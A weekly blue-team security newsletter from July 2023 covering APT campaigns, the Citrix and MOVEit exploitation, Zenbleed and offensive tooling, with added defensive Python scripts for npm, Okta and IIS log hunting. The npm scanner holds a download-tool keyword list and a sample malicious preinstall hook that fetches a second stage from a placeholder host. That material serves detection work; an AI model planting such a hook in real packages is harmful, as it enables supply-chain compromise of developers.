

Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week, understanding of the Exchange Online compromise and its implications continues to develop. Details such as the U.S. Ambassador to China being hacked in a China-linked spying operation came to light, followed by the letter from Ron Wyden to CISA. Beyond that we have the MobileIron vulnerability which was used to attack the Norwegian Government - 12 ministries thus far. This is in addition to the Citrix exploitation (see below). Finally, VirusTotal apologized for leaking some customer information.
In the high-level this week:
FACT SHEET: Biden-Harris Administration Secures Voluntary Commitments from Leading Artificial Intelligence Companies to Manage the Risks Posed by AI - The companies commit to internal and external security testing of their AI systems before their release. This testing, which will be carried out in part by independent experts, guards against some of the most significant sources of AI risks, such as biosecurity and cybersecurity, as well as its broader societal effects.
Blueprint for an AI Bill of Rights - Systems should undergo pre-deployment testing, risk identification and mitigation, and ongoing monitoring that demonstrate they are safe and effective based on their intended use, mitigation of unsafe outcomes including those beyond the intended use, and adherence to domain-specific standards.
In response - the Rise of the AI Red Teams - I covered NVIDIA’s previously, but have included again below - this week we saw Google announce theirs - expect more vendors/service providers to emulate.
CISA Analysis: Fiscal Year 2022 Risk and Vulnerability Assessments - based on 121 Risk and Vulnerability Assessments by CISA.
Evolving CDM to Transform Government Cybersecurity Operations and Enable CISA’s Approach to Interactive Cyber Defense - CDM is no longer a static effort to standardize agency capabilities and collect cybersecurity information, but rather the U.S. government’s cornerstone for proactive, coordinated, and agile cyber defense of the federal enterprise.
CERT EU Threat Landscape Report Q2 2023 - In Q2 2023, we analysed 151 malicious activities of interest targeting EU institutions, bodies, and agencies (EUIBAs) or their vicinity, and we released 39 Threat Alerts. When known, the main motive of the attackers was cyberespionage - 63% of the cases.
'Malware' in government-supplied Chinese equipment... South Korean National Intelligence Service 'Complete Investigation' - Malicious code was found in Chinese measuring equipment supplied to government agencies. The National Intelligence Service believed that the malicious code was delivered installed on Chinese equipment, and decided to investigate all Chinese equipment that had been supplied to government agencies.
Australia Supports a Cyber Secure Samoa - Australia continues to support Samoa’s cyber aspirations, including through support for MCIT’s SamCERT Division since its establishment in 2019. SamCERT is Samoa’s National Cyber Security Agency that provides awareness and support to Samoans and local organisations to be better able to respond to cybersecurity threats and incidents.
City of London Police Annual Report 2022-23 - Police Cyber Alarm has over 6,000 members and is now live in 42 police forces in England and Wales and Northern Ireland. During the past 12 months we have:
Identified 395 million suspicious incidents
Completed over 60,000 vulnerability scans on member organisations’ websites
On external networks identified 2,200 high risk, 14,200 medium risk and 3,380 low risk OPERATION HENHOUSE vulnerabilities.
Costa Rica’s Position On The Application Of International Law In Cyberspace - Costa Rica believes that existing international law applies in its entirety to ICTs, just as it does to all other technologies. With regard to the prohibition on the use of force and the rules of international humanitarian law, the International Court of Justice (ICJ) has held that these rules apply ‘to all forms of warfare and to all kinds of weapons, those of the past, those of the present and those of the future’.
Services secrets : les espions entrent à l'université - discusses the first academic journal in France on intelligence and cyber called Intelligence and Cyber French Studies.
Global head of cyber on the “incredible opportunity” facing the sector - Newman noted that this is playing out against the backdrop of cyber being poised to soon become much more prevalent in a range of different ways. Penetration rates for standalone cover may remain stubbornly low within the class, he said, but these are set to expand materially, particularly as capacity providers start to gain momentum in new areas such as personal lines cyber – and as business lines such as motor, shipping and aviation start to develop as cyber classes of business.
Russian spyware billionaire, 40, dies from ‘medical gas’ - A 40-year-old Russian tech entrepreneur who bolstered President Putin’s domestic mass-surveillance operations was found dead over the weekend, having allegedly overdosed on “medical gas”.
Information Security and Cybersecurity Management: A Case Study with SMEs in Portugal - the observed improvements must be emphasised, especially on those enterprises that adhered to Type 2 auditing. Nevertheless, without having a second auditing, SMEs that intervened with Type 1 auditing had the opportunity to evaluate 30 controls and, for those, to apply the corresponding mitigation tasks.
Why Do SBOM Haters Hate? Or Why Trade Associations Say the Darndest Things - a punchy piece from the Atlantic Council
The Dramatic Cyberattack That Put Latin America on Alert - insight into the ransomware impact in the global south.
Artificial Intelligence
Adversarial Policies Beat Superhuman Go AIs - We attack the state-of-the-art Go-playing AI system KataGo by training adversarial policies against it, achieving a >97% win rate against KataGo running at superhuman settings. Our adversaries do not win by playing Go well. Instead, they trick KataGo into making serious blunders - the blunting of AI.
“Isaac Newton to AI” Remarks before the National Press Club - speech by the SEC on the market risks stemming from AI.
Cybercom nominee plans to work with services on ‘expeditionary’ cyber forces - “Expeditionary cyber forces have already demonstrated potential to extend the reach of cyber enabling activities and close the gaps that limit cyber forces’ ability to access important tactical targets in forward locations,”
Assessing Political Motivations Behind Ransomware Attacks - the study involved data about 4,194 victims from 55 ransomware groups in the period May 2019 through April 2022.
Ransom Monetization Rates Fall to Record Low Despite Jump In Average Ransom Payments - fell to a record low of 34%.
The final OEWG draft second annual progress report is out - Valentin Weber provides this uber helpful drafting tool to see the differences
Reflections this week come from learning about Monash University-led research into growing human brain cells onto silicon chips, with new continual learning capabilities. Last year these human brain cells were taught to play Pong in about five minutes! A future with these hybrid organic and silicon systems is increasingly looking likely in our lifetime. How we will gain assurance as to their cyber resilience is going to be a voyage of discovery for us all, especially when our traditional silicon systems are still having vulnerabilities found in them today. Excuse me whilst I brush off my high-school-level biology..
On the interesting job/role front (thanks to those sending me these):
Research Associate in Cyber Diplomacy at Kings College London, UK
Staff Threat Intelligence Analyst at Google in Reston, VA, USA
Email Security Researcher at Microsoft in Multiple Locations, USA
Senior Email Security Researcher at Microsoft in Multiple Locations, USA
Principal Email Security Researcher at Microsoft in Multiple Locations, USA
Professor of Cybersecurity at The Middlebury Institute of International Studies at Monterey (MIIS), Monterey, CA, USA
Head of Cyber Operations at The Crown Estate, Hybrid, UK
Director of Science and Innovation-Fundamental Research, The Alan Turing Institute, UK
Have a lovely Friday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Russia
APT29 recently faked the German embassy and issued a malicious PDF file
Chinese reporting on Russian activity. The tradecraft shows a degree of sophistication by the use of HTML smuggling, yet the delivery mechanism is rather basic.
Recently, we once again captured APT29's attack activity impersonating the German embassy. The attack flow of the activity is roughly as follows:
The email attachment is a PDF file containing HTML code, and the zip file will be released locally after running;
The zip file contains an HTA file with the same name. After running, it releases white files, malicious DLL files and decoy files locally;
After the malicious DLL file is loaded, it will connect to the API interface of the open source chat software Zulip for data transmission, and obtain subsequent loads for local execution.
North Korea
Various tactical reporting omitted this week which can be found on the subreddit.
North Korean Hacker tries to get job
A mixed bag in this reporting on North Korean activity. They continue to try to get gainful employment in order to get paid; however, in this instance that allegedly wasn't their only intent.
He even wrote a hiring contract, but he was a 'North Korean hacker' who washed his identity - tried to get a job in a South Korean energy company's overseas branch - "North Korea continues to earn illegal IT foreign currency by mobilizing new methods
June’s npm Attack Attributed to North Korea
Two bits of reporting on this campaign, in which North Korea appears to be pushing into the open source supply chain in order to gain initial access. Whilst not a novel approach, the fact that it is now being used by this particular nation state in an attributed manner should be of note and concern.
https://blog.phylum.io/junes-sophisticated-npm-attack-attributed-to-north-korea/
Analysis of APT-C-28 (ScarCruft) organization launching Rokrat backdoor activities in the direction of energy
Chinese reporting on something we have previously covered yet is worth re-highlighting. North Korea are using large files in an effort to avoid being detected by scanning solutions.
The attacker fills the LNK file with a large amount of junk data to make the file reach 40MB+ in size, and embeds a decoy PDF document in the LNK file to use PowerShell to land and open the PDF file.
China
Pro-PRC HaiEnergy Campaign Exploits U.S. News Outlets via Newswire Services to Target U.S. Audiences
Ryan Serabian, Daniel Kapellmann Zafra, Conor Quigley and David Mainor outline an information operation which utilizes the systems of the west against itself.
we have identified new tactics, techniques, and procedures (TTPs) being employed by HaiEnergy, which includes the use of newswire services to distribute pro-PRC content to subdomains of legitimate U.S.-based news outlets. We also note the possibility the campaign is leveraging less conventional TTPs, citing a specific example in which an ad displaying pro-PRC messaging was possibly placed on a billboard in New York City’s Times Square.
https://www.mandiant.com/resources/blog/pro-prc-haienergy-us-news
Common TTPs of attacks against industrial organizations. Implants for remote access
Kirill Kruglov, Vyacheslav Kopeytsev and Artem Snegirev detail a campaign from last year which looks like it was undertaken by China.
In 2022 we investigated a series of attacks against industrial organizations in Eastern Europe. In the campaigns, the attackers aimed to establish a permanent channel for data exfiltration, including data stored on air-gapped systems.
Based on similarities found between these campaigns and previously researched campaigns (e.g., ExCone, DexCone), including the use of FourteenHi variants, specific TTPs and the scope of the attack, we have medium to high confidence that a threat actor called APT31, also known as Judgment Panda and Zirconium, is behind the activities described in this report.
Iran
Nothing this week
Analysis of SideCopy's attack activities targeting Indian government departments
Pakistani operations using topical news items in order to launch their campaigns in this Chinese reporting. The tradecraft we’ve already covered in the North Korean reporting above.
In this round of attacks, the SideCopy organization used a malicious compressed package as the attack entry point, as always. The compressed package contained a malicious LNK and used various enticing file names, such as "Violance Against Women.docx.lnk". After running, the sample releases the disguised content and loads its malicious code.
First Known Targeted OSS Supply Chain Attacks Against the Banking Sector
Tzachi Zornstein, Aviad Gershon and Yehuda Gelb detail a campaign that if verified is an interesting example of the new world of hybrid social engineering and third party software component service misuse. Will be interesting to see how the financial services sector responds here.
In the first half of 2023, [our] Supply Chain research team detected several open-source software supply chain attacks that specifically targeted the banking sector.
These attacks showcased advanced techniques, including targeting specific components in web assets of the victim bank by attaching malicious functionalities to it.
The attackers employed deceptive tactics such as creating a fake LinkedIn profile to appear credible and customized command and control (C2) centers for each target, exploiting legitimate services for illicit activities.
On the 5th and 7th of April, a threat actor leveraged the NPM platform to upload a couple of packages containing within them a preinstall script that executed its malicious objective upon installation.
Interestingly, the contributor behind these packages was linked to a LinkedIn profile page of an individual that was posing as an employee of the targeted bank.
The attacker cleverly utilized Azure’s CDN subdomains to effectively deliver the second-stage payload. This tactic is particularly clever because it bypasses traditional deny list methods, due to Azure’s status as a legitimate service.
https://checkmarx.com/blog/first-known-targeted-oss-supply-chain-attacks-against-the-banking-sector/
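The campaign above hinged on an npm preinstall script, a lifecycle hook npm runs automatically at install time. The following is an added example (not Checkmarx's tooling) that walks a node_modules tree and flags any package declaring install-time hooks, with a constructed heuristic for commands that fetch or execute remote content; the sample manifests and the cdn.example.invalid URL are constructed.

```python
"""Flag npm packages whose package.json declares install-time lifecycle scripts.

Added example modelled on the preinstall-script pattern described above; the
sample manifests and heuristics are constructed, not taken from the report.
"""
import json
from pathlib import Path

# Lifecycle hooks that npm executes automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Fragments in a script body that deserve review (constructed heuristic, not exhaustive).
SUSPICIOUS_FRAGMENTS = ("curl ", "wget ", "powershell", "base64",
                        "http://", "https://", "node -e")


def lifecycle_scripts(pkg: dict) -> dict:
    """Return {hook: command} for every install-time hook declared in a package.json dict."""
    scripts = pkg.get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def assess(pkg: dict) -> list:
    """Return one finding per install hook, marking commands that match the heuristic."""
    findings = []
    for hook, cmd in lifecycle_scripts(pkg).items():
        suspicious = any(frag in cmd.lower() for frag in SUSPICIOUS_FRAGMENTS)
        findings.append({"name": pkg.get("name", "?"), "version": pkg.get("version", "?"),
                         "hook": hook, "command": cmd, "suspicious": suspicious})
    return findings


def scan_node_modules(root) -> list:
    """Walk a node_modules tree (or any directory) and assess every package.json found."""
    findings = []
    for manifest in Path(root).rglob("package.json"):
        try:
            pkg = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or non-JSON manifest; skip rather than abort the scan
        if isinstance(pkg, dict):
            findings.extend(assess(pkg))
    return findings


# Constructed sample manifests: one ordinary package, one with a preinstall hook
# that reaches out to a CDN-style host for a second stage (placeholder domain).
SAMPLE_BENIGN = {"name": "string-helpers", "version": "1.0.0",
                 "scripts": {"test": "node test.js"}}
SAMPLE_MALICIOUS = {"name": "bank-widget-helper", "version": "0.0.3",
                    "scripts": {"preinstall":
                                "node -e \"require('https').get('https://cdn.example.invalid/stage2')\""}}

if __name__ == "__main__":
    for finding in assess(SAMPLE_BENIGN) + assess(SAMPLE_MALICIOUS):
        print(finding)
```

Point scan_node_modules at a checked-out project's node_modules to review every install hook before the code is trusted in CI.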
Conti and Akira: Chained Together
What happened to Conti you ask? Well Steven Campbell, Akshay Suthar and Connor Belfiore give us a hint. The fact they are focused on SMBs is of note.
Since March 2023, Akira ransomware has compromised at least 63 victims with approximately 80% of them being small to medium-sized businesses (SMBs).
We assess Akira is likely an opportunistic ransomware group due to their victimology and negotiation tactics.
Through blockchain analysis, we assess with a high degree of confidence that some Conti-affiliated threat actors are linked to the Akira ransomware group.
https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/
Discovery
How we find and understand the latent compromises within our environments.
Okta Logs Decoded: Threat Hunting Guide
Ori Amiga and Ron Marom provide a useful guide and tooling for those who have deployed Okta and want to detect misuse.
We’ll explore:
Each Okta audit log, learning how to analyze it and extract critical information
How to uncover hidden threats, analyze their patterns, and respond effectively. From detection of brute force and MFA fatigue attempts to impossible traveler and privilege escalation techniques
A set of free tools the Rezonate team has provided you to collect, analyze, hunt, and detect identity threats faster and easier.
https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting
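Two of the hunts the guide covers, password brute force and MFA push fatigue, can be expressed as simple windowed counts over Okta System Log events. The following is an added example (not Rezonate's tooling) over constructed events in the System Log shape; the user.session.start eventType and the outcome, actor and client fields are real Okta fields, while the push eventType name, thresholds and sample data are assumptions.

```python
"""Windowed hunts over Okta System Log events: brute force and MFA push fatigue.

Added example, not the tooling from the post. Sample events are constructed;
PUSH_EVENT is an assumed eventType name for an Okta Verify push challenge.
"""
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_EVENT = "user.session.start"                   # real Okta eventType
PUSH_EVENT = "system.push.send_factor_verify_push"   # assumed; confirm against your tenant's logs
TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%fZ"


def parse_ts(value: str) -> datetime:
    return datetime.strptime(value, TS_FORMAT)


def brute_force_sources(events, min_failures=10, min_users=3, window=timedelta(minutes=10)):
    """Source IPs with >= min_failures failed logins against >= min_users accounts inside window."""
    by_ip = defaultdict(list)
    for e in events:
        if e["eventType"] == LOGIN_EVENT and e["outcome"]["result"] == "FAILURE":
            by_ip[e["client"]["ipAddress"]].append((parse_ts(e["published"]), e["actor"]["alternateId"]))
    hits = {}
    for ip, items in by_ip.items():
        items.sort()
        for i, (t0, _) in enumerate(items):            # slide the window start over each failure
            users = [u for t, u in items[i:] if t - t0 <= window]
            if len(users) >= min_failures and len(set(users)) >= min_users:
                hits[ip] = {"failures": len(users), "users": sorted(set(users))}
                break
    return hits


def mfa_fatigue_targets(events, min_pushes=5, window=timedelta(minutes=5)):
    """Users who received >= min_pushes push challenges inside window (fatigue pattern)."""
    by_user = defaultdict(list)
    for e in events:
        if e["eventType"] == PUSH_EVENT:
            by_user[e["actor"]["alternateId"]].append(parse_ts(e["published"]))
    hits = {}
    for user, times in by_user.items():
        times.sort()
        for i, t0 in enumerate(times):
            count = sum(1 for t in times[i:] if t - t0 <= window)
            if count >= min_pushes:
                hits[user] = count
                break
    return hits


BASE = datetime(2023, 7, 24, 9, 0, 0)


def make_event(event_type, result, user, ip, offset_s):
    """Build a minimal System Log-shaped event (constructed sample data)."""
    published = (BASE + timedelta(seconds=offset_s)).strftime("%Y-%m-%dT%H:%M:%S.000Z")
    return {"eventType": event_type, "published": published,
            "outcome": {"result": result},
            "actor": {"alternateId": user},
            "client": {"ipAddress": ip}}


SAMPLE_EVENTS = (
    # 12 failed password attempts from one IP across 4 accounts within ~1 minute
    [make_event(LOGIN_EVENT, "FAILURE", f"user{i % 4}@example.com", "198.51.100.7", i * 5)
     for i in range(12)]
    # 6 push challenges to one user inside 3 minutes
    + [make_event(PUSH_EVENT, "SUCCESS", "alice@example.com", "203.0.113.9", 300 + i * 30)
       for i in range(6)]
    # benign noise: a single typo then a successful login
    + [make_event(LOGIN_EVENT, "FAILURE", "bob@example.com", "192.0.2.4", 420),
       make_event(LOGIN_EVENT, "SUCCESS", "bob@example.com", "192.0.2.4", 480)]
)

if __name__ == "__main__":
    print("brute force:", brute_force_sources(SAMPLE_EVENTS))
    print("mfa fatigue:", mfa_fatigue_targets(SAMPLE_EVENTS))
```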
Defence
How we proactively defend our environments.
timesketch: Collaborative forensic timeline analysis
A mature project here from Google which is worth highlighting for a variety of cyber use cases.
Timesketch is an open-source tool for collaborative forensic timeline analysis. Using sketches you and your collaborators can easily organize your timelines and analyze them all at the same time. Add meaning to your raw data with rich annotations, comments, tags and stars.
https://github.com/google/timesketch
Prefetch: The Little Snitch That Tells on You
Shane Hartman provides a guide as to the value of this information source in understanding what happened on Windows hosts.
The prefetch file, while not intended for analysis, can provide a wealth of information for an investigator. When opened, a prefetch file can show:
Creation date – timestamped with the local time of the machine
Date/time of last execution time – timestamped with the local time of the machine
Run count – the number of times the executable has been launched
Other run times – limited to the previous eight (8) executions
Directories and files referenced – includes other executables
Volumes and file paths – the location from which files were accessed
https://www.trustedsec.com/blog/prefetch-the-little-snitch-that-tells-on-you/
Vulnerability
Our attack surface.
CVE-2023-3519: Citrix ADC Gateway RCE
This has been a painful week for this vulnerability.
DHS Advisory on Citrix exploitation CVE-2023-3519
In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization’s non-production environment NetScaler ADC appliance. The webshell enabled the actors to perform discovery on the victim’s active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network-segmentation controls for the appliance blocked movement.
The victim organization identified the compromise and reported the activity to CISA and Citrix. Citrix released a patch for this vulnerability on July 18, 2023.
This advisory provides tactics, techniques, and procedures (TTPs) and detection methods shared with CISA by the victim. CISA encourages critical infrastructure organizations to use the detection guidance included in this advisory for help with determining system compromise.
commercial reporting
https://blog.assetnote.io/2023/07/21/citrix-CVE-2023-3519-analysis/
https://blog.assetnote.io/2023/07/24/citrix-rce-part-2-cve-2023-3519/
https://bishopfox.com/blog/citrix-adc-gateway-rce-cve-2023-3519
Accurately fingerprint and detect vulnerable (and patched!) versions of Netscaler / Citrix ADC to CVE-2023-3519
Bryan Smith provides a tool to understand global exposure.
The cve_2023_3519_inspector.py script is a Python-based vulnerability scanner for detecting the CVE-2023-3519 vulnerability in Citrix Gateways. It performs a passive analysis and fingerprinting of target websites to assess their vulnerability based on a series of checks.
https://github.com/securekomodo/citrixInspector
Zenbleed: all AMD Zen 2 class processors affected
Tavis Ormandy continues to pioneer and details a vulnerability which is going to need some IaaS providers respond. There are likely more of these types of issues lurking..
It turns out that with precise scheduling, you can cause some processors to recover from a mispredicted vzeroupper incorrectly! This technique is CVE-2023-20593 and it works on all Zen 2 class processors, which includes at least the following products:
AMD Ryzen 3000 Series Processors
AMD Ryzen PRO 3000 Series Processors
AMD Ryzen Threadripper 3000 Series Processors
AMD Ryzen 4000 Series Processors with Radeon Graphics
AMD Ryzen PRO 4000 Series Processors
AMD Ryzen 5000 Series Processors with Radeon Graphics
AMD Ryzen 7020 Series Processors with Radeon Graphics
AMD EPYC “Rome” Processors
The bug works like this: first of all you need to trigger something called the XMM Register Merge Optimization, followed by a register rename and a mispredicted vzeroupper. This all has to happen within a precise window to work.
https://lock.cmpxchg8b.com/zenbleed.html
AWS has released their response
https://aws.amazon.com/security/security-bulletins/AWS-2023-004/
BMC&C: Lights Out Forever
Nate Warfield, Scott Scheferman and Vlad Babkin detail vulnerabilities which could brick data centers and/or be used to sit beneath the hosts and hypervisors which run on the machines in question.
The vulnerabilities discovered are addressed by the following CVEs:
CVE-2023-34329 – Authentication Bypass via HTTP Header Spoofing
CVE-2023-34330 – Code injection via Dynamic Redfish Extension interface
The impact of exploiting these vulnerabilities includes remote control of compromised servers, remote deployment of malware, ransomware and firmware implanting or bricking motherboard components (BMC or potentially BIOS/UEFI), potential physical damage (over-voltage / bricking), and indefinite reboot loops that a victim cannot stop.
https://eclypsium.com/research/bmcc-lights-out-forever/
A new type of DDoS attack? Research on DDoS reflection amplification attack based on QUIC protocol
Chinese reporting on a protocol amplification attack which could cause some headaches.
[Our] team found through research that there are actually a large number of QUIC servers that can be used for reflection amplification in the existing network, and the number of reflectors and the amplification factor are very considerable, and the amplification factor can reach up to 250 times. QUIC reflection attacks may be on stage in the not-too-distant future.
Offense
Attack capability, techniques and trade-craft.
WSPCoerce: PoC to coerce authentication from Windows hosts using MS-WSP
Simon Lemire provides a tool which no doubt some actors will find enterprising ways to leverage as they move laterally around estates.
It's a tool to interact with remote hosts using the Windows Search Protocol and coerce authentication. The target host will connect over SMB to the listener host using the machine account.
Requirements:
Must be running in the context of a domain user (no specific privileges required on target system AFAIK)
445/TCP open on the target system
445/TCP open on the listener system
Windows Search Service running on the target system
Note: The Windows Search Service is NOT enabled by default on Windows Server so in practice this attack is only effective against Windows workstations.
https://github.com/slemire/WSPCoerce
Beyond File Search: A Novel Method for Exploiting the "search-ms" URI Protocol Handler
Mathanraj Thangaraju and Sijo Jacob detail an attack technique which is really quite clever as a technique in order to appear legitimate.
During an attack leveraging the “search” / “search-ms” URI protocol handler, threat actors may create deceptive emails containing hyperlinks or email attachments that redirect users to compromised websites. When users visit the website, malicious JavaScript initiates searches on a remote server using the “search” / "search-ms" URI protocol handler. The search results of remotely hosted malicious shortcut files are displayed in Windows Explorer disguised as PDFs or other trusted icons, just like local search results. This smart technique conceals the fact that the user is being provided with remote files and gives the user the illusion of trust. As a result, the user is more likely to open the file, assuming it is from their own system, and unknowingly execute malicious code.
https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
SaaS attack techniques
Luke Jennings details how in a SaaS first world there is a parallel ATT&CK framework (full disclosure: I invest in them).
This repository is a collection of SaaS-specific attack techniques. It is intended to be a resource for security researchers, red/blue teams, and penetration testers to learn about and share SaaS attack techniques.
Quick note: we wanted to start sharing as early as possible, so this is very much a work in progress. Hopefully there is enough to see the shape of things to come, but no doubt there are gaps - we'll be filling them in over the coming weeks and months. If you can help fill in some references, add examples, or point us to missing techniques - please open an issue (or even a PR)! We'll be very sure to credit you.
For more information on the background to this project, check the following blog post
https://github.com/pushsecurity/saas-attacks
Exploitation
What is being exploited.
CVE-2023-3519: Exploitation of Citrix Zero-Day by Possible Espionage Actors
James Nugent, Foti Castelan, Doug Bienstock, Justin Moore and Josh Murchie detail the Citrix exploitation from their perspective. If there were any doubts as to China’s capability
During analysis of the compromised appliance, [we] identified a simple PHP eval web shell located in /var/vpn/themes. The web shell had the earliest file system modified time of all the identified malware and was relatively compact (113 bytes). As a result, Mandiant assessed with moderate confidence that the web shell was placed on the system as part of the initial exploitation vector.
https://www.mandiant.com/resources/blog/citrix-zero-day-espionage
CVE-2023-35078 - Remote Unauthenticated API Access Vulnerability in MobileIron Core / Ivanti Endpoint Manager Mobile
This is the vulnerability used to compromise the Norwegian Government. The vulnerability itself was trivial to discover and exploit, implying the product hadn’t been recently security tested.
MOVEit Vulnerability Investigations Uncover Additional Exfiltration Method
Devon Ackerman, Steven Coffey, Josh Mitchell and Dan Cox provide details on how to detect a second means of data exfiltration.
[We] identified two different file exfiltration methodologies leveraged by threat actors, primarily CLOP, during recent engagements involving the exploitation of the MOVEit vulnerability (CVE-2023-34362) throughout May and June 2023.
..
Method 2 exfiltration may have occurred if hundreds, thousands or tens of thousands of GET and POST requests have been made by the same IP address to the web shell over the course of hours or days.
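The Method 2 indicator above is a volume pattern: one client IP issuing hundreds or more GET and POST requests to the web shell path over hours or days. The following is an added example (not Kroll's tooling) that parses IIS W3C log lines, honouring the #Fields: directive, and reports per-IP request counts and time span against a placeholder shell path; the log lines, path and threshold are constructed.

```python
"""Hunt IIS W3C logs for bulk GET/POST traffic to a MOVEit web shell path.

Added example, not from the Kroll post. WEBSHELL_PATH is a placeholder and the
log content is constructed to show the pattern the report describes.
"""
from collections import defaultdict
from datetime import datetime

WEBSHELL_PATH = "/example-webshell.aspx"  # placeholder; substitute the shell path found on the host


def parse_iis_w3c(text):
    """Yield one dict per request row, using the column names from the #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed row: skip rather than misalign columns
        yield dict(zip(fields, parts))


def webshell_activity(text, path=WEBSHELL_PATH, min_requests=100):
    """Per-IP GET/POST counts and first/last seen for the shell path; IPs at/over threshold only."""
    stats = defaultdict(lambda: {"GET": 0, "POST": 0, "first": None, "last": None})
    for row in parse_iis_w3c(text):
        if row.get("cs-uri-stem", "").lower() != path.lower():
            continue
        if row.get("cs-method") not in ("GET", "POST"):
            continue
        ts = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
        s = stats[row["c-ip"]]
        s[row["cs-method"]] += 1
        s["first"] = ts if s["first"] is None or ts < s["first"] else s["first"]
        s["last"] = ts if s["last"] is None or ts > s["last"] else s["last"]
    return {
        ip: {**s, "hours": round((s["last"] - s["first"]).total_seconds() / 3600, 2)}
        for ip, s in stats.items()
        if s["GET"] + s["POST"] >= min_requests
    }


def _constructed_log() -> str:
    """Build a small IIS-style log: one IP hammering the shell, plus ordinary traffic."""
    header = "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status\n"
    rows = []
    # 300 alternating GET/POST requests from one IP spread over ~5 hours
    for i in range(300):
        method = "GET" if i % 2 == 0 else "POST"
        rows.append(f"2023-06-02 {1 + i // 60:02d}:{i % 60:02d}:17 {method} "
                    f"{WEBSHELL_PATH} - 198.51.100.23 200")
    # normal API use and a single request to the shell path from another IP
    rows.append("2023-06-02 03:10:01 GET /api/v1/folders - 192.0.2.10 200")
    rows.append(f"2023-06-02 04:42:55 GET {WEBSHELL_PATH} - 203.0.113.77 404")
    return header + "\n".join(rows) + "\n"


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for ip, s in webshell_activity(SAMPLE_LOG).items():
        print(ip, s["GET"], "GET", s["POST"], "POST over", s["hours"], "hours")
```

Lower min_requests and point the function at your real logs once the shell path is known; a single request to the path is still worth a look, but the bulk pattern is what distinguishes Method 2.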
MOVEit hack victim list
Bert Kondruss makes various corporate communications teams go to battle stations. The scale in literal victims as well as potential GDPR exposure here is monumental.
Number of known victims of the MOVEit attack so far:
522 organizations
32 to 35 million individuals
https://konbriefing.com/en-topics/cyber-attacks-moveit-victim-list.html
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
Nothing this week
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
Artificial intelligence
Foreign Ministries and Cyber Power: Implications of Artificial Intelligence
Jina Embeddings: A Novel Set of High-Performance Sentence Embedding Models
Ethical Governance of Artificial Intelligence for Defence: Normative Tradeoffs for Principle to Practice Guidance - we outline the key normative choices and corresponding tradeoffs that are involved in specifying guidance for the implementation of AI ethics principles in the defence domain
Adversarial Policies Beat Superhuman Go AIs - I know I included this at the top, but just be sure everyone reads it.
It’s more than just money: The real-world harms from ransomware attacks
Dead Man's PLC: Towards Viable Cyber Extortion for Operational Technology
Bluepurple Pulse: week ending July 30th
It seems that the EU CERT report is linked to this URL:
https://cert.europa.eu/static/threat-intelligence/TLP-CLEAR-TLR2023-Q2-ExecSum-1.0.pdf